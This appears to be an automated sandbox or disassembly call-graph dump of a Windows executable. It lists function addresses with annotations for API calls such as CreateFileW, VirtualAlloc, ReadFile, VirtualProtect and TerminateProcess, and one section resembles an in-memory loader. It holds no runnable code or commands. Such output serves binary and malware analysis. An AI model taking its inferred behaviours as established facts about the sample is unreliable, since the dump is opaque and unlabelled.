95887->95930 95888 4907f4 95890 490840 95888->95890 95932 4905ab 72 API calls 4 library calls 95888->95932 95895 49086d 95890->95895 95933 49014d 72 API calls 4 library calls 95890->95933 95891 4907c8 95891->95878 95894 490866 95894->95895 95896 49087e 95894->95896 95897 4886ae __wsopen_s 29 API calls 95895->95897 95896->95872 95898 4908fc CloseHandle 95896->95898 95897->95872 95934 49039a CreateFileW 95898->95934 95900 490927 95901 490931 GetLastError 95900->95901 95902 49095d 95900->95902 95935 47f2a3 20 API calls 2 library calls 95901->95935 95902->95872 95904 49093d 95936 485333 21 API calls 3 library calls 95904->95936 95906->95854 95907->95859 95908->95859 95910 48522d __FrameHandler3::FrameUnwindToState 95909->95910 95937 482f5e EnterCriticalSection 95910->95937 95912 48527b 95938 48532a 95912->95938 95913 485259 95941 485000 95913->95941 95914 485234 95914->95912 95914->95913 95919 4852c7 EnterCriticalSection 95914->95919 95917 4852a4 __wsopen_s 95917->95866 95919->95912 95920 4852d4 LeaveCriticalSection 95919->95920 95920->95914 95922->95880 95923->95878 95924->95872 95925->95873 95926->95878 95927->95886 95928->95878 95929->95884 95930->95891 95931->95888 95932->95890 95933->95894 95934->95900 95935->95904 95936->95902 95937->95914 95949 482fa6 LeaveCriticalSection 95938->95949 95940 485331 95940->95917 95942 484c7d _abort 20 API calls 95941->95942 95947 485012 95942->95947 95943 48501f 95944 4829c8 _free 20 API calls 95943->95944 95945 485071 95944->95945 95945->95912 95948 485147 EnterCriticalSection 95945->95948 95947->95943 95950 483405 11 API calls 2 library calls 95947->95950 95948->95912 95949->95940 95950->95947 95951 4a2a00 95966 45d7b0 ISource 95951->95966 95952 45db11 PeekMessageW 95952->95966 95953 45d807 GetInputState 95953->95952 95953->95966 95955 4a1cbe TranslateAcceleratorW 95955->95966 95956 45db8f PeekMessageW 95956->95966 95957 45da04 timeGetTime 95957->95966 95958 45db73 TranslateMessage DispatchMessageW 95958->95956 95959 45dbaf Sleep 95976 45dbc0 95959->95976 95960 4a2b74 Sleep 95960->95976 95961 46e551 timeGetTime 95961->95976 95962 4a1dda timeGetTime 96072 46e300 23 API calls 95962->96072 95965 4a2c0b GetExitCodeProcess 95970 4a2c21 WaitForSingleObject 95965->95970 95971 4a2c37 CloseHandle 95965->95971 95966->95952 95966->95953 95966->95955 95966->95956 95966->95957 95966->95958 95966->95959 95966->95960 95966->95962 95968 45d9d5 95966->95968 95978 45ec40 207 API calls 95966->95978 95983 45dd50 95966->95983 95990 45dfd0 95966->95990 96013 461310 95966->96013 96070 45bf40 207 API calls 2 library calls 95966->96070 96071 46edf6 IsDialogMessageW GetClassLongW 95966->96071 96073 4c3a2a 23 API calls 95966->96073 96074 4c359c 82 API calls __wsopen_s 95966->96074 95967 4e29bf GetForegroundWindow 95967->95976 95970->95966 95970->95971 95971->95976 95972 4a2a31 95972->95968 95973 4a2ca9 Sleep 95973->95966 95976->95961 95976->95965 95976->95966 95976->95967 95976->95968 95976->95972 95976->95973 96075 4d5658 23 API calls 95976->96075 96076 4be97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95976->96076 96077 4bd4dc 47 API calls 95976->96077 95978->95966 95984 45dd83 95983->95984 95985 45dd6f 95983->95985 96079 4c359c 82 API calls __wsopen_s 95984->96079 96078 45d260 207 API calls 2 library calls 95985->96078 95988 45dd7a 95988->95966 95989 4a2f75 95989->95989 95991 45e010 95990->95991 96009 45e0dc ISource 95991->96009 96082 470242 5 API calls __Init_thread_wait 95991->96082 95994 4a2fca 95997 45a961 22 API calls 95994->95997 95994->96009 95995 45e3e1 95995->95966 95996 45a961 22 API calls 95996->96009 96000 4a2fe4 95997->96000 96083 4700a3 29 API calls __onexit 96000->96083 96003 4a2fee 96084 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96003->96084 96004 45ec40 207 API calls 96004->96009 96006 4c359c 82 API calls 96006->96009 96008 45a8c7 22 API calls 96008->96009 96009->95995 96009->95996 96009->96004 96009->96006 96009->96008 96010 4604f0 22 API calls 96009->96010 96080 45a81b 41 API calls 96009->96080 96081 46a308 207 API calls 96009->96081 96085 470242 5 API calls __Init_thread_wait 96009->96085 96086 4700a3 29 API calls __onexit 96009->96086 96087 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96009->96087 96088 4d47d4 207 API calls 96009->96088 96089 4d68c1 207 API calls 96009->96089 96010->96009 96014 461376 96013->96014 96015 4617b0 96013->96015 96016 461390 96014->96016 96017 4a6331 96014->96017 96242 470242 5 API calls __Init_thread_wait 96015->96242 96019 461940 9 API calls 96016->96019 96201 4d709c 96017->96201 96022 4613a0 96019->96022 96021 4617ba 96024 4617fb 96021->96024 96243 459cb3 96021->96243 96025 461940 9 API calls 96022->96025 96023 4a633d 96023->95966 96028 4a6346 96024->96028 96030 46182c 96024->96030 96027 4613b6 96025->96027 96027->96024 96029 4613ec 96027->96029 96253 4c359c 82 API calls __wsopen_s 96028->96253 96029->96028 96053 461408 __fread_nolock 96029->96053 96250 45aceb 23 API calls ISource 96030->96250 96033 461839 96251 46d217 207 API calls 96033->96251 96034 4617d4 96249 4701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96034->96249 96037 4a636e 96254 4c359c 82 API calls __wsopen_s 96037->96254 96039 46152f 96040 46153c 96039->96040 96041 4a63d1 96039->96041 96042 461940 9 API calls 96040->96042 96256 4d5745 54 API calls _wcslen 96041->96256 96044 461549 96042->96044 96047 4a64fa 96044->96047 96050 461940 9 API calls 96044->96050 96045 46fddb 22 API calls 96045->96053 96046 46fe0b 22 API calls 96046->96053 96057 4a6369 96047->96057 96257 4c359c 82 API calls __wsopen_s 96047->96257 96048 461872 96252 46faeb 23 API calls 96048->96252 96055 461563 96050->96055 96052 45ec40 207 API calls 96052->96053 96053->96033 96053->96037 96053->96039 96053->96045 96053->96046 96053->96052 96054 4a63b2 96053->96054 96053->96057 96255 4c359c 82 API calls __wsopen_s 96054->96255 96055->96047 96058 45a8c7 22 API calls 96055->96058 96060 4615c7 ISource 96055->96060 96057->95966 96058->96060 96059 461940 9 API calls 96059->96060 96060->96047 96060->96048 96060->96057 96060->96059 96062 46167b ISource 96060->96062 96090 4c744a 96060->96090 96146 4cf0ec 96060->96146 96155 4de204 96060->96155 96191 456246 96060->96191 96195 4c83da 96060->96195 96198 4d958b 96060->96198 96061 46171d 96061->95966 96062->96061 96241 46ce17 22 API calls ISource 96062->96241 96070->95966 96071->95966 96072->95966 96073->95966 96074->95966 96075->95976 96076->95976 96077->95976 96078->95988 96079->95989 96080->96009 96081->96009 96082->95994 96083->96003 96084->96009 96085->96009 96086->96009 96087->96009 96088->96009 96089->96009 96091 4c7469 96090->96091 96092 4c7474 96090->96092 96289 45b567 39 API calls 96091->96289 96094 4c7554 96092->96094 96096 45a961 22 API calls 96092->96096 96095 46fddb 22 API calls 96094->96095 96135 4c76a4 96094->96135 96097 4c7587 96095->96097 96098 4c7495 96096->96098 96099 46fe0b 22 API calls 96097->96099 96100 45a961 22 API calls 96098->96100 96101 4c7598 96099->96101 96102 4c749e 96100->96102 96103 456246 CloseHandle 96101->96103 96104 457510 53 API calls 96102->96104 96105 4c75a3 96103->96105 96107 4c74aa 96104->96107 96106 45a961 22 API calls 96105->96106 96108 4c75ab 96106->96108 96290 45525f 22 API calls 96107->96290 96110 456246 CloseHandle 96108->96110 96112 4c75b2 96110->96112 96111 4c74bf 96291 456350 96111->96291 96258 457510 96112->96258 96116 4c754a 96302 45b567 39 API calls 96116->96302 96119 456246 CloseHandle 96122 4c75c8 96119->96122 96121 4c7502 96121->96116 96123 4c7506 96121->96123 96281 455745 96122->96281 96124 459cb3 22 API calls 96123->96124 96126 4c7513 96124->96126 96301 4bd2c1 26 API calls 96126->96301 96129 4c76de GetLastError 96131 4c76f7 96129->96131 96130 4c75ea 96303 4553de 27 API calls ISource 96130->96303 96310 456216 CloseHandle ISource 96131->96310 96134 4c75f8 96304 4553c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96134->96304 96135->96060 96136 4c751c 96136->96116 96138 4c7645 96139 46fddb 22 API calls 96138->96139 96141 4c7679 96139->96141 96140 4c75ff 96140->96138 96305 4bccff 96140->96305 96142 45a961 22 API calls 96141->96142 96144 4c7686 96142->96144 96144->96135 96309 4b417d 22 API calls __fread_nolock 96144->96309 96147 457510 53 API calls 96146->96147 96148 4cf126 96147->96148 96333 459e90 96148->96333 96150 4cf136 96151 4cf15b 96150->96151 96152 45ec40 207 API calls 96150->96152 96154 4cf15f 96151->96154 96361 459c6e 22 API calls 96151->96361 96152->96151 96154->96060 96156 45a961 22 API calls 96155->96156 96157 4de21b 96156->96157 96158 457510 53 API calls 96157->96158 96159 4de22a 96158->96159 96160 456270 22 API calls 96159->96160 96161 4de23d 96160->96161 96162 457510 53 API calls 96161->96162 96163 4de24a 96162->96163 96164 4de2c7 96163->96164 96165 4de262 96163->96165 96166 457510 53 API calls 96164->96166 96393 45b567 39 API calls 96165->96393 96168 4de2cc 96166->96168 96170 4de2d9 96168->96170 96171 4de314 96168->96171 96169 4de267 96169->96170 96174 4de280 96169->96174 96396 459c6e 22 API calls 96170->96396 96172 4de32c 96171->96172 96397 45b567 39 API calls 96171->96397 96183 4de345 96172->96183 96398 45b567 39 API calls 96172->96398 96394 456d25 22 API calls __fread_nolock 96174->96394 96178 45a8c7 22 API calls 96180 4de35f 96178->96180 96179 4de28d 96181 456350 22 API calls 96179->96181 96374 4b92c8 96180->96374 96182 4de29b 96181->96182 96395 456d25 22 API calls __fread_nolock 96182->96395 96183->96178 96186 4de2b4 96187 456350 22 API calls 96186->96187 96189 4de2c2 96187->96189 96399 4562b5 22 API calls 96189->96399 96190 4de2e6 96190->96060 96192 456250 96191->96192 96193 45625f 96191->96193 96192->96060 96193->96192 96194 456264 CloseHandle 96193->96194 96194->96192 96412 4c98e3 96195->96412 96197 4c83ea 96197->96060 96494 4d7f59 96198->96494 96200 4d959b 96200->96060 96202 4d70db 96201->96202 96203 4d70f5 96201->96203 96589 4c359c 82 API calls __wsopen_s 96202->96589 96578 4d5689 96203->96578 96207 45ec40 206 API calls 96208 4d7164 96207->96208 96209 4d71ff 96208->96209 96212 4d70ed 96208->96212 96213 4d71a6 96208->96213 96210 4d7205 96209->96210 96211 4d7253 96209->96211 96590 4c1119 22 API calls 96210->96590 96211->96212 96214 457510 53 API calls 96211->96214 96212->96023 96217 4c0acc 22 API calls 96213->96217 96215 4d7265 96214->96215 96218 45aec9 22 API calls 96215->96218 96221 4d71de 96217->96221 96222 4d7289 CharUpperBuffW 96218->96222 96219 4d7228 96591 45a673 22 API calls 96219->96591 96224 461310 206 API calls 96221->96224 96225 4d72a3 96222->96225 96223 4d7230 96592 45bf40 207 API calls 2 library calls 96223->96592 96224->96212 96226 4d72f6 96225->96226 96229 4d72aa 96225->96229 96228 457510 53 API calls 96226->96228 96230 4d72fe 96228->96230 96585 4c0acc 96229->96585 96593 46e300 23 API calls 96230->96593 96234 461310 206 API calls 96234->96212 96235 4d7308 96235->96212 96236 457510 53 API calls 96235->96236 96237 4d7323 96236->96237 96594 45a673 22 API calls 96237->96594 96239 4d7333 96595 45bf40 207 API calls 2 library calls 96239->96595 96241->96062 96242->96021 96244 459cc2 _wcslen 96243->96244 96245 46fe0b 22 API calls 96244->96245 96246 459cea __fread_nolock 96245->96246 96247 46fddb 22 API calls 96246->96247 96248 459d00 96247->96248 96248->96034 96249->96024 96250->96033 96251->96048 96252->96048 96253->96057 96254->96057 96255->96057 96256->96055 96257->96057 96259 457525 96258->96259 96260 457522 96258->96260 96261 45752d 96259->96261 96262 45755b 96259->96262 96260->96119 96311 4751c6 26 API calls 96261->96311 96264 4950f6 96262->96264 96265 45756d 96262->96265 96273 49500f 96262->96273 96314 475183 26 API calls 96264->96314 96312 46fb21 51 API calls 96265->96312 96266 45753d 96272 46fddb 22 API calls 96266->96272 96269 495088 96313 46fb21 51 API calls 96269->96313 96270 49510e 96270->96270 96274 457547 96272->96274 96273->96269 96276 46fe0b 22 API calls 96273->96276 96275 459cb3 22 API calls 96274->96275 96275->96260 96277 495058 96276->96277 96278 46fddb 22 API calls 96277->96278 96279 49507f 96278->96279 96280 459cb3 22 API calls 96279->96280 96280->96269 96282 45575c CreateFileW 96281->96282 96283 494035 96281->96283 96284 45577b 96282->96284 96283->96284 96285 49403b CreateFileW 96283->96285 96284->96129 96284->96130 96285->96284 96286 494063 96285->96286 96315 4554c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96286->96315 96288 49406e 96288->96284 96289->96092 96290->96111 96292 456362 96291->96292 96293 494a51 96291->96293 96316 456373 96292->96316 96326 454a88 22 API calls __fread_nolock 96293->96326 96296 45636e 96296->96116 96300 4bd4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 96296->96300 96297 494a5b 96298 494a67 96297->96298 96299 45a8c7 22 API calls 96297->96299 96299->96298 96300->96121 96301->96136 96302->96094 96303->96134 96304->96140 96306 4bcd19 WriteFile 96305->96306 96307 4bcd0e 96305->96307 96306->96138 96332 4bcc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96307->96332 96309->96135 96310->96135 96311->96266 96312->96266 96313->96264 96314->96270 96315->96288 96318 456382 96316->96318 96322 4563b6 __fread_nolock 96316->96322 96317 494a82 96320 46fddb 22 API calls 96317->96320 96318->96317 96319 4563a9 96318->96319 96318->96322 96327 45a587 96319->96327 96323 494a91 96320->96323 96322->96296 96324 46fe0b 22 API calls 96323->96324 96325 494ac5 __fread_nolock 96324->96325 96326->96297 96328 45a59d 96327->96328 96331 45a598 __fread_nolock 96327->96331 96329 49f80f 96328->96329 96330 46fe0b 22 API calls 96328->96330 96330->96331 96331->96322 96332->96306 96362 456270 96333->96362 96335 459fd2 96336 45a4a1 22 API calls 96335->96336 96344 459fec 96336->96344 96339 45a6c3 22 API calls 96360 459eb5 96339->96360 96340 49f7c4 96372 4b96e2 84 API calls __wsopen_s 96340->96372 96341 49f699 96347 46fddb 22 API calls 96341->96347 96343 45a405 96343->96344 96373 4b96e2 84 API calls __wsopen_s 96343->96373 96344->96150 96349 49f754 96347->96349 96348 49f7d2 96350 45a4a1 22 API calls 96348->96350 96352 46fe0b 22 API calls 96349->96352 96351 49f7e8 96350->96351 96351->96344 96354 45a12c __fread_nolock 96352->96354 96354->96340 96354->96343 96355 45a587 22 API calls 96355->96360 96356 45a4a1 22 API calls 96356->96360 96357 45aec9 22 API calls 96358 45a0db CharUpperBuffW 96357->96358 96368 45a673 22 API calls 96358->96368 96360->96335 96360->96339 96360->96340 96360->96341 96360->96343 96360->96354 96360->96355 96360->96356 96360->96357 96367 454573 41 API calls _wcslen 96360->96367 96369 4548c8 23 API calls 96360->96369 96370 4549bd 22 API calls __fread_nolock 96360->96370 96371 45a673 22 API calls 96360->96371 96361->96154 96363 46fe0b 22 API calls 96362->96363 96364 456295 96363->96364 96365 46fddb 22 API calls 96364->96365 96366 4562a3 96365->96366 96366->96360 96367->96360 96368->96360 96369->96360 96370->96360 96371->96360 96372->96348 96373->96344 96375 45a961 22 API calls 96374->96375 96376 4b92de 96375->96376 96377 456270 22 API calls 96376->96377 96378 4b92f2 96377->96378 96385 4b9314 96378->96385 96400 4b8e54 96378->96400 96381 4b8e54 41 API calls 96381->96385 96384 456350 22 API calls 96384->96385 96385->96381 96385->96384 96386 4b93b3 96385->96386 96388 4b9397 96385->96388 96408 456d25 22 API calls __fread_nolock 96385->96408 96387 45a8c7 22 API calls 96386->96387 96389 4b93c2 96386->96389 96387->96389 96409 456d25 22 API calls __fread_nolock 96388->96409 96389->96189 96391 4b93a7 96392 456350 22 API calls 96391->96392 96392->96386 96393->96169 96394->96179 96395->96186 96396->96190 96397->96172 96398->96183 96399->96190 96401 4b8e74 _wcslen 96400->96401 96402 4b8f63 96401->96402 96404 4b8ea9 96401->96404 96406 4b8f68 96401->96406 96402->96385 96407 456d25 22 API calls __fread_nolock 96402->96407 96404->96402 96410 46ce60 41 API calls 96404->96410 96406->96402 96411 46ce60 41 API calls 96406->96411 96407->96385 96408->96385 96409->96391 96410->96404 96411->96406 96413 4c99e8 96412->96413 96414 4c9902 96412->96414 96470 4c9caa 39 API calls 96413->96470 96415 46fddb 22 API calls 96414->96415 96417 4c9909 96415->96417 96418 46fe0b 22 API calls 96417->96418 96419 4c991a 96418->96419 96422 456246 CloseHandle 96419->96422 96420 4c99a2 96421 4c9ac5 96420->96421 96424 4c99ca 96420->96424 96428 4c9a33 96420->96428 96463 4c1e96 96421->96463 96423 4c9925 96422->96423 96426 45a961 22 API calls 96423->96426 96424->96197 96429 4c992d 96426->96429 96427 4c9acc 96432 4bccff 4 API calls 96427->96432 96430 457510 53 API calls 96428->96430 96431 456246 CloseHandle 96429->96431 96439 4c9a3a 96430->96439 96433 4c9934 96431->96433 96457 4c9aa8 96432->96457 96435 457510 53 API calls 96433->96435 96434 4c9abb 96481 4bcd57 30 API calls 96434->96481 96438 4c9940 96435->96438 96436 4c9a6e 96440 456270 22 API calls 96436->96440 96441 456246 CloseHandle 96438->96441 96439->96434 96439->96436 96442 4c9a7e 96440->96442 96443 4c994a 96441->96443 96445 4c9a8e 96442->96445 96448 45a8c7 22 API calls 96442->96448 96446 455745 5 API calls 96443->96446 96444 456246 CloseHandle 96447 4c9b1e 96444->96447 96471 4533c6 96445->96471 96449 4c9959 96446->96449 96482 456216 CloseHandle ISource 96447->96482 96448->96445 96452 4c995d 96449->96452 96453 4c99c2 96449->96453 96467 4553de 27 API calls ISource 96452->96467 96469 456216 CloseHandle ISource 96453->96469 96457->96424 96457->96444 96459 4c996b 96468 4553c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96459->96468 96461 4c9972 96461->96420 96462 4bccff 4 API calls 96461->96462 96462->96420 96464 4c1e9f 96463->96464 96465 4c1ea4 96463->96465 96483 4c0f67 24 API calls __fread_nolock 96464->96483 96465->96427 96467->96459 96468->96461 96469->96424 96470->96420 96472 4930bb 96471->96472 96473 4533dd 96471->96473 96475 46fddb 22 API calls 96472->96475 96484 4533ee 96473->96484 96477 4930c5 _wcslen 96475->96477 96476 4533e8 96480 4bcd57 30 API calls 96476->96480 96478 46fe0b 22 API calls 96477->96478 96479 4930fe __fread_nolock 96478->96479 96480->96457 96481->96457 96482->96424 96483->96465 96485 4533fe _wcslen 96484->96485 96486 49311d 96485->96486 96487 453411 96485->96487 96489 46fddb 22 API calls 96486->96489 96488 45a587 22 API calls 96487->96488 96490 45341e __fread_nolock 96488->96490 96491 493127 96489->96491 96490->96476 96492 46fe0b 22 API calls 96491->96492 96493 493157 __fread_nolock 96492->96493 96495 457510 53 API calls 96494->96495 96496 4d7f90 96495->96496 96518 4d7fd5 ISource 96496->96518 96532 4d8cd3 96496->96532 96498 4d8281 96499 4d844f 96498->96499 96504 4d828f 96498->96504 96573 4d8ee4 60 API calls 96499->96573 96502 4d845e 96503 4d846a 96502->96503 96502->96504 96503->96518 96545 4d7e86 96504->96545 96505 457510 53 API calls 96522 4d8049 96505->96522 96510 4d82c8 96560 46fc70 96510->96560 96513 4d82e8 96566 4c359c 82 API calls __wsopen_s 96513->96566 96514 4d8302 96567 4563eb 22 API calls 96514->96567 96517 4d82f3 GetCurrentProcess TerminateProcess 96517->96514 96518->96200 96519 4d8311 96568 456a50 22 API calls 96519->96568 96521 4d832a 96530 4d8352 96521->96530 96569 4604f0 22 API calls 96521->96569 96522->96498 96522->96505 96522->96518 96564 4b417d 22 API calls __fread_nolock 96522->96564 96565 4d851d 42 API calls _strftime 96522->96565 96524 4d84c5 96524->96518 96526 4d84d9 FreeLibrary 96524->96526 96525 4d8341 96570 4d8b7b 75 API calls 96525->96570 96526->96518 96530->96524 96571 4604f0 22 API calls 96530->96571 96572 45aceb 23 API calls ISource 96530->96572 96574 4d8b7b 75 API calls 96530->96574 96533 45aec9 22 API calls 96532->96533 96534 4d8cee CharLowerBuffW 96533->96534 96535 4b8e54 41 API calls 96534->96535 96536 4d8d0f 96535->96536 96538 45a961 22 API calls 96536->96538 96544 4d8d48 _wcslen 96536->96544 96539 4d8d2a 96538->96539 96575 456d25 22 API calls __fread_nolock 96539->96575 96541 4d8d3e 96542 4593b2 22 API calls 96541->96542 96542->96544 96543 4d8e5e _wcslen 96543->96522 96544->96543 96576 4d851d 42 API calls _strftime 96544->96576 96546 4d7ea1 96545->96546 96550 4d7eec 96545->96550 96547 46fe0b 22 API calls 96546->96547 96548 4d7ec3 96547->96548 96549 46fddb 22 API calls 96548->96549 96548->96550 96549->96548 96551 4d9096 96550->96551 96552 4d92ab ISource 96551->96552 96559 4d90ba _strcat _wcslen 96551->96559 96552->96510 96553 45b38f 39 API calls 96553->96559 96554 45b567 39 API calls 96554->96559 96555 45b6b5 39 API calls 96555->96559 96556 457510 53 API calls 96556->96559 96557 47ea0c 21 API calls ___std_exception_copy 96557->96559 96559->96552 96559->96553 96559->96554 96559->96555 96559->96556 96559->96557 96577 4befae 24 API calls _wcslen 96559->96577 96562 46fc85 96560->96562 96561 46fd1d VirtualProtect 96563 46fceb 96561->96563 96562->96561 96562->96563 96563->96513 96563->96514 96564->96522 96565->96522 96566->96517 96567->96519 96568->96521 96569->96525 96570->96530 96571->96530 96572->96530 96573->96502 96574->96530 96575->96541 96576->96543 96577->96559 96579 4d56f2 96578->96579 96580 4d56a4 96578->96580 96579->96207 96581 46fe0b 22 API calls 96580->96581 96583 4d56c6 96581->96583 96582 46fddb 22 API calls 96582->96583 96583->96579 96583->96582 96596 4c0a59 22 API calls 96583->96596 96586 4c0b13 96585->96586 96587 4c0ada 96585->96587 96586->96234 96587->96586 96588 46fddb 22 API calls 96587->96588 96588->96586 96589->96212 96590->96219 96591->96223 96592->96212 96593->96235 96594->96239 96595->96212 96596->96583 96597 4a3a41 96601 4c10c0 96597->96601 96599 4a3a4c 96600 4c10c0 53 API calls 96599->96600 96600->96599 96602 4c10fa 96601->96602 96607 4c10cd 96601->96607 96602->96599 96603 4c10fc 96613 46fa11 53 API calls 96603->96613 96604 4c1101 96606 457510 53 API calls 96604->96606 96608 4c1108 96606->96608 96607->96602 96607->96603 96607->96604 96610 4c10f4 96607->96610 96609 456350 22 API calls 96608->96609 96609->96602 96612 45b270 39 API calls 96610->96612 96612->96602 96613->96604 96614 1572ebb 96617 1572b30 96614->96617 96616 1572f07 96618 1570560 GetPEB 96617->96618 96621 1572bcf 96618->96621 96620 1572c00 CreateFileW 96620->96621 96627 1572c0d 96620->96627 96622 1572c29 VirtualAlloc 96621->96622 96621->96627 96628 1572d30 CloseHandle 96621->96628 96629 1572d40 VirtualFree 96621->96629 96630 1573a40 GetPEB 96621->96630 96623 1572c4a ReadFile 96622->96623 96622->96627 96626 1572c68 VirtualAlloc 96623->96626 96623->96627 96624 1572e1c VirtualFree 96625 1572e2a 96624->96625 96625->96616 96626->96621 96626->96627 96627->96624 96627->96625 96628->96621 96629->96621 96631 1573a6a 96630->96631 96631->96620 96632 492ba5 96633 452b25 96632->96633 96634 492baf 96632->96634 96660 452b83 7 API calls 96633->96660 96675 453a5a 96634->96675 96638 492bb8 96640 459cb3 22 API calls 96638->96640 96642 492bc6 96640->96642 96641 452b2f 96650 452b44 96641->96650 96664 453837 96641->96664 96643 492bce 96642->96643 96644 492bf5 96642->96644 96645 4533c6 22 API calls 96643->96645 96647 4533c6 22 API calls 96644->96647 96648 492bd9 96645->96648 96658 492bf1 GetForegroundWindow ShellExecuteW 96647->96658 96649 456350 22 API calls 96648->96649 96652 492be7 96649->96652 96654 452b5f 96650->96654 96674 4530f2 Shell_NotifyIconW ___scrt_fastfail 96650->96674 96656 4533c6 22 API calls 96652->96656 96657 452b66 SetCurrentDirectoryW 96654->96657 96655 492c26 96655->96654 96656->96658 96659 452b7a 96657->96659 96658->96655 96682 452cd4 7 API calls 96660->96682 96662 452b2a 96663 452c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96662->96663 96663->96641 96665 453862 ___scrt_fastfail 96664->96665 96683 454212 96665->96683 96668 4538e8 96670 453906 Shell_NotifyIconW 96668->96670 96671 493386 Shell_NotifyIconW 96668->96671 96687 453923 96670->96687 96673 45391c 96673->96650 96674->96654 96676 491f50 __wsopen_s 96675->96676 96677 453a67 GetModuleFileNameW 96676->96677 96678 459cb3 22 API calls 96677->96678 96679 453a8d 96678->96679 96680 453aa2 23 API calls 96679->96680 96681 453a97 96680->96681 96681->96638 96682->96662 96684 4538b7 96683->96684 96685 4935a4 96683->96685 96684->96668 96709 4bc874 42 API calls _strftime 96684->96709 96685->96684 96686 4935ad DestroyIcon 96685->96686 96686->96684 96688 453a13 96687->96688 96689 45393f 96687->96689 96688->96673 96690 456270 22 API calls 96689->96690 96691 45394d 96690->96691 96692 493393 LoadStringW 96691->96692 96693 45395a 96691->96693 96695 4933ad 96692->96695 96694 456b57 22 API calls 96693->96694 96696 45396f 96694->96696 96701 45a8c7 22 API calls 96695->96701 96703 453994 ___scrt_fastfail 96695->96703 96697 4933c9 96696->96697 96698 45397c 96696->96698 96700 456350 22 API calls 96697->96700 96698->96695 96699 453986 96698->96699 96702 456350 22 API calls 96699->96702 96704 4933d7 96700->96704 96701->96703 96702->96703 96706 4539f9 Shell_NotifyIconW 96703->96706 96704->96703 96705 4533c6 22 API calls 96704->96705 96707 4933f9 96705->96707 96706->96688 96708 4533c6 22 API calls 96707->96708 96708->96703 96709->96668 96710 452e37 96711 45a961 22 API calls 96710->96711 96712 452e4d 96711->96712 96789 454ae3 96712->96789 96714 452e6b 96715 453a5a 24 API calls 96714->96715 96716 452e7f 96715->96716 96717 459cb3 22 API calls 96716->96717 96718 452e8c 96717->96718 96719 454ecb 94 API calls 96718->96719 96720 452ea5 96719->96720 96721 452ead 96720->96721 96722 492cb0 96720->96722 96725 45a8c7 22 API calls 96721->96725 96723 4c2cf9 80 API calls 96722->96723 96724 492cc3 96723->96724 96726 492ccf 96724->96726 96727 454f39 68 API calls 96724->96727 96728 452ec3 96725->96728 96730 454f39 68 API calls 96726->96730 96727->96726 96803 456f88 22 API calls 96728->96803 96732 492ce5 96730->96732 96731 452ecf 96733 459cb3 22 API calls 96731->96733 96819 453084 22 API calls 96732->96819 96734 452edc 96733->96734 96804 45a81b 41 API calls 96734->96804 96737 452eec 96739 459cb3 22 API calls 96737->96739 96738 492d02 96820 453084 22 API calls 96738->96820 96740 452f12 96739->96740 96805 45a81b 41 API calls 96740->96805 96743 492d1e 96744 453a5a 24 API calls 96743->96744 96745 492d44 96744->96745 96821 453084 22 API calls 96745->96821 96746 452f21 96749 45a961 22 API calls 96746->96749 96748 492d50 96750 45a8c7 22 API calls 96748->96750 96751 452f3f 96749->96751 96752 492d5e 96750->96752 96806 453084 22 API calls 96751->96806 96822 453084 22 API calls 96752->96822 96755 452f4b 96807 474a28 40 API calls 3 library calls 96755->96807 96756 492d6d 96761 45a8c7 22 API calls 96756->96761 96758 452f59 96758->96732 96759 452f63 96758->96759 96808 474a28 40 API calls 3 library calls 96759->96808 96763 492d83 96761->96763 96762 452f6e 96762->96738 96764 452f78 96762->96764 96823 453084 22 API calls 96763->96823 96809 474a28 40 API calls 3 library calls 96764->96809 96767 492d90 96768 452f83 96768->96743 96769 452f8d 96768->96769 96810 474a28 40 API calls 3 library calls 96769->96810 96771 452f98 96772 452fdc 96771->96772 96811 453084 22 API calls 96771->96811 96772->96756 96773 452fe8 96772->96773 96773->96767 96813 4563eb 22 API calls 96773->96813 96776 452fbf 96778 45a8c7 22 API calls 96776->96778 96777 452ff8 96814 456a50 22 API calls 96777->96814 96780 452fcd 96778->96780 96812 453084 22 API calls 96780->96812 96782 453006 96815 4570b0 23 API calls 96782->96815 96786 453021 96787 453065 96786->96787 96816 456f88 22 API calls 96786->96816 96817 4570b0 23 API calls 96786->96817 96818 453084 22 API calls 96786->96818 96790 454af0 __wsopen_s 96789->96790 96791 456b57 22 API calls 96790->96791 96792 454b22 96790->96792 96791->96792 96800 454b58 96792->96800 96824 454c6d 96792->96824 96794 454c6d 22 API calls 96794->96800 96795 459cb3 22 API calls 96797 454c52 96795->96797 96796 459cb3 22 API calls 96796->96800 96798 45515f 22 API calls 96797->96798 96799 454c5e 96798->96799 96799->96714 96800->96794 96800->96796 96801 45515f 22 API calls 96800->96801 96802 454c29 96800->96802 96801->96800 96802->96795 96802->96799 96803->96731 96804->96737 96805->96746 96806->96755 96807->96758 96808->96762 96809->96768 96810->96771 96811->96776 96812->96772 96813->96777 96814->96782 96815->96786 96816->96786 96817->96786 96818->96786 96819->96738 96820->96743 96821->96748 96822->96756 96823->96767 96825 45aec9 22 API calls 96824->96825 96826 454c78 96825->96826 96826->96792 96827 453156 96830 453170 96827->96830 96831 453187 96830->96831 96832 45318c 96831->96832 96833 4531eb 96831->96833 96874 4531e9 96831->96874 96837 453265 PostQuitMessage 96832->96837 96838 453199 96832->96838 96835 492dfb 96833->96835 96836 4531f1 96833->96836 96834 4531d0 DefWindowProcW 96871 45316a 96834->96871 96879 4518e2 10 API calls 96835->96879 96839 45321d SetTimer RegisterWindowMessageW 96836->96839 96840 4531f8 96836->96840 96837->96871 96842 4531a4 96838->96842 96843 492e7c 96838->96843 96847 453246 CreatePopupMenu 96839->96847 96839->96871 96844 453201 KillTimer 96840->96844 96845 492d9c 96840->96845 96848 492e68 96842->96848 96849 4531ae 96842->96849 96884 4bbf30 34 API calls ___scrt_fastfail 96843->96884 96875 4530f2 Shell_NotifyIconW ___scrt_fastfail 96844->96875 96851 492da1 96845->96851 96852 492dd7 MoveWindow 96845->96852 96846 492e1c 96880 46e499 42 API calls 96846->96880 96847->96871 96883 4bc161 27 API calls ___scrt_fastfail 96848->96883 96856 492e4d 96849->96856 96857 4531b9 96849->96857 96859 